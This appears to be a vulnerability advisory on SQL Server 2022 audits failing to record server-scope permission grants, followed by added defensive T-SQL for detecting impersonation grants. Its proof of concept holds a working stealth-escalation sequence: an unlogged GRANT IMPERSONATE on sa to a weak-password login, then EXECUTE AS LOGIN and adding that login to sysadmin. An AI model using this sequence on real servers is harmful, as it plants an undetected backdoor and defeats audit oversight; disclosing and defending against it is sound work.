Title: SQL Server 2022 Security Audit Failure Vulnerability
Product: Microsoft SQL Server
Affected Version(s): 2022 (RTM-CU18) (KB5050771)
Tested Version(s): 2022 (RTM-CU18) (KB5050771)
Fix: This security bug will be fixed in a future cumulative update released by Microsoft
Risk Level: Medium
Author of Advisory: Emad Al-Mousa

Overview:
Native security auditing is an important facility used to track and monitor activities within the database based on pre-defined audit policies. These audit policies are engineered by the vendor to capture sensitive actions that could potentially jeopardise your database system.

*****************************************
Vulnerability Details:
In Microsoft SQL Server 2022, when a security audit is configured for the "SERVER_PERMISSION_CHANGE_GROUP" action group, server-scope permission changes are not recorded in the audit logs as expected and as designed!

*****************************************
Proof of Concept (PoC):
I will create a dummy local SQL authentication account and call it "TIM":

USE [master]
GO
CREATE LOGIN [TIM] WITH PASSWORD=N'TIM', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO

Then, I will create the audit policy as shown below:

USE [master]
GO
CREATE SERVER AUDIT [test-permission-change]
TO FILE
(   FILEPATH = N'D:\SQLServer_2022\audit\'
   ,MAXSIZE = 0 MB
   ,MAX_ROLLOVER_FILES = 2147483647
   ,RESERVE_DISK_SPACE = OFF
)
WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE, AUDIT_GUID = 'a2d718eb-2588-4d64-b7c9-249441e96d42')
ALTER SERVER AUDIT [test-permission-change] WITH (STATE = ON)
GO

USE [master]
GO
CREATE SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE]
FOR SERVER AUDIT [test-permission-change]
ADD (SERVER_PERMISSION_CHANGE_GROUP)
WITH (STATE = ON)
GO

Per the documentation (https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16):

SERVER_PERMISSION_CHANGE_GROUP: This event is raised when a GRANT, REVOKE, or DENY is issued for permissions in the server scope.

It is therefore expected that the configured security audit will capture the following T-SQL statement:

GRANT IMPERSONATE ON LOGIN::sa TO TIM
GO

Unfortunately, the above T-SQL command is NOT logged in the audit logs!! This can be verified by querying the audit files:

SELECT * FROM sys.fn_get_audit_file('D:\SQLServer_2022\audit\*', DEFAULT, DEFAULT) ORDER BY event_time DESC
GO

The instance now carries a backdoor/weakness that will not be detected: nothing in the audit trail records the IMPERSONATE grant. The database account TIM can log in and execute the following T-SQL to escalate to the sysadmin fixed server role:

EXECUTE AS LOGIN = 'sa'
ALTER SERVER ROLE [sysadmin] ADD MEMBER [TIM]
GO

*****************************************
References:
https://databasesecurityninja.wordpress.com/2025/04/01/sql-server-vulnerability-audit-failure-for-server_permission_change_group-in-sql-server-2022/
https://learn.microsoft.com/en-us/sql/relational-databases/security/auditing/sql-server-audit-action-groups-and-actions?view=sql-server-ver16
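The following T-SQL is an added example of a compensating control for the audit gap described in this advisory; it is not part of the original advisory and not vendor code. Because the GRANT itself is not written to the audit file on the affected build, a defender can instead (1) inventory IMPERSONATE grants on logins straight from the catalog views, (2) extend the audit specification with action groups that fire on the later steps of the PoC (the EXECUTE AS and the sysadmin membership change), and (3) read back only the relevant audit records. The audit name, specification name, file path and login names are taken from the advisory; the choice of additional action groups and the inventory query are this example's own assumptions.

```sql
-- Added example (not part of the original advisory).
-- Assumes the audit [test-permission-change] and the specification
-- [AUDIT_SER_PERM_CHANGE] from the PoC already exist on the instance.

-- (1) Inventory: which login may impersonate which other login, and whether
--     the impersonated login is a member of sysadmin. A grantee that can
--     impersonate a sysadmin login is effectively sysadmin, so schedule this
--     (e.g. as an Agent job) and alert on every row it returns.
SELECT
    grantee.name   AS grantee_login,
    grantor.name   AS granted_by,
    target.name    AS impersonated_login,
    sp.state_desc  AS grant_state,
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS grantee ON grantee.principal_id = sp.grantee_principal_id
JOIN sys.server_principals  AS grantor ON grantor.principal_id = sp.grantor_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = sp.major_id
WHERE sp.class_desc      = 'SERVER_PRINCIPAL'   -- permission scoped to a login
  AND sp.permission_name = 'IMPERSONATE'
  AND sp.state_desc IN ('GRANT', 'GRANT_WITH_GRANT_OPTION')
ORDER BY target_is_sysadmin DESC, grantee_login;
-- In the PoC scenario this returns one row with grantee_login = TIM,
-- impersonated_login = sa and target_is_sysadmin = 1, even though the
-- audit file holds no record of the GRANT.

-- (2) Layered auditing: add action groups that capture the impersonation
--     (EXECUTE AS LOGIN) and the fixed-server-role membership change, so the
--     escalation leaves a trail even though the GRANT does not. A server
--     audit specification must be stopped before it can be modified.
USE [master];
GO
ALTER SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE] WITH (STATE = OFF);
GO
ALTER SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE]
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP),
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP);
GO
ALTER SERVER AUDIT SPECIFICATION [AUDIT_SER_PERM_CHANGE] WITH (STATE = ON);
GO

-- (3) Read back only the relevant audit records instead of SELECT *.
--     On the affected build the IMPERSONATE row is expected to be missing;
--     the ALTER SERVER ROLE row appears once (2) is in place.
SELECT event_time, action_id, succeeded,
       server_principal_name, object_name, statement
FROM sys.fn_get_audit_file(N'D:\SQLServer_2022\audit\*', DEFAULT, DEFAULT)
WHERE statement LIKE '%IMPERSONATE%'
   OR statement LIKE '%ALTER SERVER ROLE%'
ORDER BY event_time DESC;
```

The inventory query in (1) is the piece that does not depend on auditing at all: it reports the current state of sys.server_permissions, so a grant that slipped past the audit is still visible the next time the job runs. Part (2) does not make the missing GRANT event reappear; it only ensures that the steps an attacker must take afterwards are recorded.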